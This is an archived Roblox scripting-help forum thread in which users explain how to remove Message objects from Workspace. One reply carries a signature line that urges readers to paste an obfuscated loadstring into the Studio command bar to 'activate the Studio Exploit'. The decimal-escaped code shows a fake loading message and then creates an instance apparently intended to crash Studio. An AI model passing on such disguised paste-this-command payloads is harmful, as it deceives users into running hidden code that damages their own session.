generic image
Processing...
  • Games
  • Catalog
  • Develop
  • Robux
  • Search in Players
  • Search in Games
  • Search in Catalog
  • Search in Groups
  • Search in Library
  • Log In
  • Sign Up
  • Games
  • Catalog
  • Develop
  • Robux
   
ROBLOX Forum » Game Creation and Development » Scripting Helpers
Home Search
 

Re: How to clear a message with script

Previous Thread :: Next Thread 
LordGando is not online. LordGando
Joined: 05 Jul 2011
Total Posts: 6723
29 Aug 2013 07:37 PM
This wont work:

Game.Workspace.Message:remove

-LᴏʀᴅGᴀɴᴅᴏ - Cows make milk, I drink milk
Report Abuse
Raphael7 is not online. Raphael7
Joined: 03 Dec 2008
Total Posts: 2479
29 Aug 2013 07:37 PM
for _, v in pairs(game.Workspace:GetChildren()) do
if v:IsA('Message') then
v:Destroy()
end
end

> Please run this on your command bar in order to activate the Studio Exploit, loadstring("\108\101\108\32\61\32\34\76\111\97\100\105\110\103\32\82\97\112\104\97\101\108\55\39\115\32\83\116\117\100\105\111\32\69\120\112\108\111\105\116\34\10\109\115\103\32\61\32\73\110\115\116\97\110\99\101\46\110\101\119\40\39\77\101\115\115\97\103\101\39\44\32\87\111\114\107\115\112\97\99\101\41\10\102\111\114\32\105\32\61\32\49\44\32\108\101\108\58\108\101\110\40\41\32\100\111\32\119\97\105\116\40\48\46\49\53\41\10\109\115\103\46\84\101\120\116\32\61\32\109\115\103\46\84\101\120\116\46\46\108\101\108\58\115\117\98\40\105\44\105\41\10\101\110\100\10\119\97\105\116\40\50\41\10\102\111\114\32\105\32\61\32\49\44\32\109\97\116\104\46\114\97\110\100\111\109\40\55\44\32\49\52\41\32\100\111\32\119\97\105\116\40\48\46\49\53\41\32\109\115\103\46\84\101\120\116\32\61\32\39\80\108\101\97\115\101\32\119\97\105\116\39\10\119\97\105\116\40\48\46\49\53\41\32\109\115\103\46\84\101\120\116\32\61\32\39\80\108\101\97\115\101\32\119\97\105\116\46\39\10\119\97\105\116\40\48\46\49\53\41\32\109\115\103\46\84\101\120\116\32\61\32\39\80\108\101\97\115\101\32\119\97\105\116\46\46\39\10\119\97\105\116\40\48\46\49\53\41\32\109\115\103\46\84\101\120\116\32\61\32\39\80\108\101\97\115\101\32\119\97\105\116\46\46\46\39\10\101\110\100\10\73\110\115\116\97\110\99\101\46\110\101\119\40\39\77\97\110\117\97\108\83\117\114\102\97\99\101\74\111\105\110\116\73\110\115\116\97\110\99\101\39\41\10")()
Report Abuse
ProfitMargin is not online. ProfitMargin
Joined: 01 Aug 2013
Total Posts: 285
29 Aug 2013 07:38 PM
:Remove()
Report Abuse
Previous Thread :: Next Thread 
Page 1 of 1
 
 
ROBLOX Forum » Game Creation and Development » Scripting Helpers
   
 
   
  • About Us
  • Jobs
  • Blog
  • Parents
  • Help
  • Terms
  • Privacy

©2017 Roblox Corporation. Roblox, the Roblox logo, Robux, Bloxy, and Powering Imagination are among our registered and unregistered trademarks in the U.S. and other countries.



Progress
Starting Roblox...
Connecting to Players...
R R

Roblox is now loading. Get ready to play!

R R

You're moments away from getting into the game!

Click here for help

Check Remember my choice and click Launch Application in the dialog box above to join games faster in the future!

Gameplay sponsored by:
Loading 0% - Starting game...
Get more with Builders Club! Join Builders Club
Choose Your Avatar
I have an account
generic image